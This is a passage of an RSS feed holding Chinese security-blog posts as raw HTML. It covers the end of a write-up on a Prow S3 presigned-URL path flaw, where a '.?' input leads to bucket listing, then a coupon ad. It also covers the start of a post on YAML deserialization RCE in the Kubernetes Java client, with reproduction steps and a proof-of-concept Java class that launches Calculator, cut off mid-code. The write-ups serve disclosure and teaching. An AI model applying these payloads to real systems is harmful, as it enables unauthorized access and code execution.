&#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（1）用户输入直接参与 S3 签名路径 Prow 提供了一个接口：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">/job-history/s3/{bucket}/{path}</span></code><span leaf=""> 但：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">{path} 没有做严格校验</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">用户可以构造特殊路径</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（2）拼接逻辑存在缺陷</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">系统逻辑类似：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">final_path = user_input + &#34;/latest.txt&#34; sign(final_path)</span></code><span leaf=""> 问题：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">假设 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">user_input = .?\</span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">实际 URL：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">s3://bucket/.?/latest.txt</span></code><span leaf=""> 但：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">? 在 URL 中是 query 分隔符</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">后面的 /latest.txt 被浏览器/服务端忽略</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">实际签名对象变成：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">s3://bucket/.</span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（3）S3 Bucket 支持 List 操作</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">如果 Bucket 权限允许（常见于内部日志桶）：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">GET / → 返回对象列表</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结果：目录遍历（Bucket Listing）</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">五一假期来了，星球也已经运营三年多了，</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box; margin: 0px; cursor: pointer; color: rgb(63, 63, 63); font-size: 16px; line-height: 1.8em; letter-spacing: 0.02em; text-align: left; text-indent: 0px; padding: 16px 0px 8px; font-family: Optima, \&#34;Microsoft YaHei\&#34;, PingFangSC-regular, serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; orphans: 2; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">发个优惠券</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015736" data-s="300,640" type="block" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=a1f152c4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRyz294zFPyZaolibWDJaABVRgb497s6TzWdudYcYCQeDNxRJ4NZN55Gyjial0d8UKTwY2HlnTCuxic6sYvbibtiaWtgaic9wa9Xrm8Sk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=80eebf85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxSlusVyu8RZeShU0M1Y7Eib8nicITkgSH358iboQo2NOJBRKzTr1J45rCgzUlKenUvvrw5z5H4rEFjXg9F97rRiaDfRR9KmpwyQCY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1485500" target="_blank">https://hackerone.com/reports/1485500</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bc46d93d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499387%26idx%3D1%26sn%3Dbb5a25d0d00e22b80ceebc2162ec23c0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 01 May 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>由一个反序列化问题所想到的通用思路</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499380&amp;idx=1&amp;sn=de9ee1908ac799dac70ffac10ecf3c77</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-04-30 10:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=44f96093&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRwib6kmG86rvfXHLKgzQE9UemdGTf5sEfplfianELyGocAWo2ykgSsJ4xAc6oCQvhrOdQ7jKgDdedFanPKxt23VNbZtglVPgdjBQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">由一个反序列化问题所想到的思路</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=529886a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwiaicicNkDO0qxeNLk47v2TzYypGEqic6WKjeoZZWgPiat3zPu2MZAs3nefibvc2T7S7xcpm8lv2HMTdEic1PCg0fMdBKKeKfHAOo7JI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">如果使用 io.kubernetes.client.util.generic.dynamic.Dynamics 来把不受信任的 YAML 反序列化成 DynamicKubernetesObject，攻击者就可以在 JVM 内实现代码执行。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">复现步骤： 搭一个服务器，提供一个包含如下代码的 JAR 文件：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">package org.jlleitschuh.sandbox;</span><span leaf=""><br/></span><span leaf="">import javax.script.ScriptEngine;</span><span leaf=""><br/></span><span leaf="">import javax.script.ScriptEngineFactory;</span><span leaf=""><br/></span><span leaf="">import java.io.IOException;</span><span leaf=""><br/></span><span leaf="">import java.util.List;</span><span leaf=""><br/></span><span leaf="">public class ScriptEngineFactoryRCE implements ScriptEngineFactory {</span><span leaf=""><br/></span><span leaf="">    static {</span><span leaf=""><br/></span><span leaf="">        try {</span><span leaf=""><br/></span><span leaf="">            Runtime r = Runtime.getRuntime();</span><span leaf=""><br/></span><span leaf="">            Process p = r.exec(</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;open -a Calculator&#34;</span></span><span leaf="">);</span><span leaf=""><br/></span><span leaf="">            p.waitFor();</span><span leaf=""><br/></span><span leaf="">        } catch (IOException | InterruptedException e) {</span><span leaf=""><br/></span><span leaf="">            throw new RuntimeException(e);</span><span leaf=""><br/></span><span leaf="">        }</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getEngineName</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getEngineVersion</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public List&lt;String&gt; </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getExtensions</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public List&lt;String&gt; </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getMimeTypes</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public List&lt;String&gt; </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getNames</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getLanguageName</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String </span><span style="box-sizing: border-box;cursor: pointer;line-height: 26px;"><span style="box-sizing: border-box;color: rgb(97, 174, 238);cursor: pointer;line-height: 26px;"><span leaf="">getLanguageVersion</span></span></span><span leaf="">() {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public Object getParameter(String key) {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">return</span></span><span leaf=""> null;</span><span leaf=""><br/></span><span leaf="">    }</span><span leaf=""><br/></span><span leaf="">    @Override</span><span leaf=""><br/></span><span leaf="">    public String getMethodCallSyntax(String obj, String m, String... args) {</span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 